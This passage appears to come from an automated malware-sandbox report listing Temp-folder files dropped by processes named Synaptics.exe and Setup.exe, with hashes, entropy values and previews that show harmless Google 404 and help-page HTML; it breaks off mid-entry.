                                                                                            SHA1:286D4CEF70F358A4EC602F79079E0D4B7E634355
                                                                                            SHA-256:BF7B445F93B673AB25AE68A111A68C7B96650C2C62C37F28F5E7D942DD2A6446
                                                                                            SHA-512:45FC843DC955CDD1A9B157303E0C6C7AD1BA3C8D9B7B1415DFE3B4B75F38739A7F36C28D409AAFB1136F5D8E489CBBFB6A67B3341B0BCC3314FB28A8F2AC47AC
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YSackhOMX9KtfozeiwQuNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\5KJMXP3.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.269222460234289
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tg+pAZewRDK4mW
                                                                                            MD5:8BD7DB0CA1852FD809956E6D8146C7C0
                                                                                            SHA1:C4FB53FF0F8D9DA9EE0275872C0D09F276D71A6E
                                                                                            SHA-256:DF5E768268938E601A48454F1328C85E09F77BEBF36DB1471EA4AB80C74A58E7
                                                                                            SHA-512:167EF6AAAD2E352ED5AEB9A0DAA7EC5D5711AB664DFFDB1297DC1CB0BA477E2FA4DCE573A99759E89FDA0344461376D48F2B8B5141C7D0B9BE5F126E4E256B01
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7vm4TcMCPtvIxb6wMJUXHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\5wuDjsS.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2555620575046476
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                            MD5:7C453115FDF721B88697AA03CB6D5B36
                                                                                            SHA1:65A614EC83CC2B7DED7D5ADF48349A676FD1C749
                                                                                            SHA-256:FAF557AAE7BC90A0954717B80D2D120895A1BACCCB7B740A63D42F5BA53C9086
                                                                                            SHA-512:BA08A3CAA7CBE8A090760833D46F0E8370AE1826F58355111B712D65B7D3EC4142E874F3B72343670093F4AD8E2418C4F7C1362B6A985F620F9ED6F947CCC3F3
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ouimtxd-ZgGLizCYhRGNGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\6LkY7Br.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2651839672627805
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QOWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1OW+pAZewRDK4mW
                                                                                            MD5:CB81CB0146FB8345F215DA7D02F4766F
                                                                                            SHA1:DC18EB82650ED04CE197A4910CA11C31B30C4EAC
                                                                                            SHA-256:A0249FA3CADE96A5D7AADED40A9E4DD43AD1E7BE25BBAC0E977FF86CE2904D00
                                                                                            SHA-512:8DD5DE739418E2261EC3576FADAC8673B2560CC4F99534B8112384C28E19A30D3160E228943A791612770F730A3954F1B818DDE20BE913EE73ACC5AE11B5EBD7
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OCEPhg3RHVM1sgm5wLXo-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\6hCt2oR.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255120626943478
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+036SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G6+pAZewRDK4mW
                                                                                            MD5:8C9C26F51DAC9F972D7931E4226EA49C
                                                                                            SHA1:BC2FE37F4F7575B8E03EE20806D836B869CB89CA
                                                                                            SHA-256:7BF4F9351D5A34A9D6502277DA70692123A6C796D05061A3AE3DCA1FC37D7DE9
                                                                                            SHA-512:4C49FC2F86BEC28832DD3626AA3646D6DF2D3D8CC48EEC163E6A0FA608860B1D882756F76CD4DAC9F6201A68F6FBAF98E639D29C4187E263913E6B23972F4B3C
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iqj2YguP2yq8MvqMpognLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\8G1DtGr.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.262181928115323
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0Xr7eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+yr7e+pAZewRDK4mW
                                                                                            MD5:33DA394E4D9A86B1C5FA618DBC988915
                                                                                            SHA1:6232CF3E79448D9CECCCE5F1670EC18D3BF037B6
                                                                                            SHA-256:816A282D344ED82263381FAD369492E9B5E4B049F6E4810C95171211E29B4904
                                                                                            SHA-512:5EEE3CF4D3E204C067A3E50423BACE1AE6DEDF6243EF9AE67447DA0C20ECE2E85807165605DBC2B863F0F6B53BB6B34E6D35FD88C137286FFAF70A0965E685D8
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-Pz7N53Zzo9lVNyOuWV1ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\BVog7PB.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254220355445165
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                            MD5:72C9BA0CA3D21871A0F998871F8CB5BC
                                                                                            SHA1:CFB984715C03DEED0E0C821BBD1228FF6AE8F4C2
                                                                                            SHA-256:F1E87ECBD9BDE6C9BFFB228894832C61AF7389CA0ED18A412EB0E0CC166C8E07
                                                                                            SHA-512:74AF1FDCA3E2E00F61F4EE020C988DB1627B628AC3DEB49FFBC83EBB1EBF1CB10BEC52C039FD1A1221843AE598A810804CCD4C9AEC3E436959E0B73439B3EBF9
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1_cU6Tf_Zf1oCuqXsmcq0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\ByySPxa.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.256761159536325
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0kbDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                            MD5:D9761BE8A5AC863E4C9B5585ADE2C590
                                                                                            SHA1:0C2D8F1BC89C0118DD991C44CE0F0F6C768FC2E0
                                                                                            SHA-256:D45C0F9C5729FF45C704B19DFD4ACCBE9C04F9DBCFE40DBA7187FE69770396A7
                                                                                            SHA-512:B02A2678BB91F6C9DB7AD2B008D4A7A56AFC4324CE2956A82A932A15EBDA11AD76C1A1D14AD89198DA8E0DCDC48B31FE6069893DDD20EE4F7CD835F1B1CCEF90
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bkuoW5aH4BectVZFjwny4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\HFI2E3E.tmp.html

                                                                                            Download File
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):16118
                                                                                            Entropy (8bit):3.6434775915277604
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                            Malicious:false
                                                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                            C:\Users\user\AppData\Local\Temp\HFI92E.tmp.html

                                                                                            Download File
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):16118
                                                                                            Entropy (8bit):3.6434775915277604
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                            Malicious:false
                                                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                            C:\Users\user\AppData\Local\Temp\HyK5ol8.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260447060091902
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0UufSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                            MD5:3018ABDC8521D274F0B88997B66C7AAA
                                                                                            SHA1:3B68C6CF8ED52964617BA96843BDFDA221BF4D93
                                                                                            SHA-256:D1CF06701E60B5F7E393070F15ADFB4ABCAA2D6C9B7D18DD042FEB95C6B0B140
                                                                                            SHA-512:C0961715226DF19ABC5108D1E5699FF36F79C978D54401311BE896D294C1D7FE6092BA6FBEA2DE17851CD5E936BB1FF544F4656BBA7AED2FE3F2C4120AEFD8A7
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kfVBeSjy0dvT4Flj1fNhhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\IQjqBFu.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254484489293086
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0OqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                            MD5:244561A88AF7B99CAAA738F850CD5261
                                                                                            SHA1:98674DB30213D5E949838129C32A494E56B17B8E
                                                                                            SHA-256:04635F85685E7F90B510F722795A09BF7B16ACC4D4C5C9B29EC7399DAC839DED
                                                                                            SHA-512:BD52F9C371AA5979336F94A85EC3BEF3DCC952C3D9AF491A0271E3ECF6E9B90D26BB7E4EF8A3C99EC23C622239383BE90D986839E4A04F52CD4AB74B8F3CE293
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wmb4qu6gGBpmT3TstaQEuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\IT1lpFB.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.265705514224978
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+05zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                            MD5:827B101A43989ADA8D07EEDD247B9333
                                                                                            SHA1:F6EA8C8A63C64393804184249FDE22AE10FA7E5F
                                                                                            SHA-256:6BC19FEA0CB05C07A102BD2F495301C6E31454010029B002337C6B0828CD2CD9
                                                                                            SHA-512:885A1FA4FD234A2AC9BD3887FA1984350B31BCE054D1D86082752D292B858A92B99218B35CEBB09AEB467B29C2B4AA4B24130BD88CB93F6CF4F7C73927154C57
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e4XHmMWCurIEh8jbwqqpnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\MGXNPlW.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.261904824646331
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                            MD5:DFF4EFEA34D2D818013559FA261D9592
                                                                                            SHA1:A634D37DAC6E5590A5ED53D6DC4DDBCAE5820CDC
                                                                                            SHA-256:5CFE72423E8D72CCFE3150E4EB0D5382E5EDC1D8D446AA32EB52D2B7C15ADEF5
                                                                                            SHA-512:E981528D7219C1299EE292F2BC5D718DC1680414315B9C4063856163F51E5F27E2CB75B400A069823B9CC07CC48D55CE4AC6076EB7E07AFDE9970D6AC10748D0
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pu4w0mJ0SVJOOrsIy3MWxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\MIUKB6a.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.24941429541812
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0h4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W4+pAZewRDK4mW
                                                                                            MD5:2A5719D95A6CBBAB2463FABA099273C9
                                                                                            SHA1:C056EDE6BA4C1929582D1516D10C4FEEA86BA474
                                                                                            SHA-256:EC936EF972B10405BFBF664A7B7E146ABDA655477DA82051F660338F0AC9D0F4
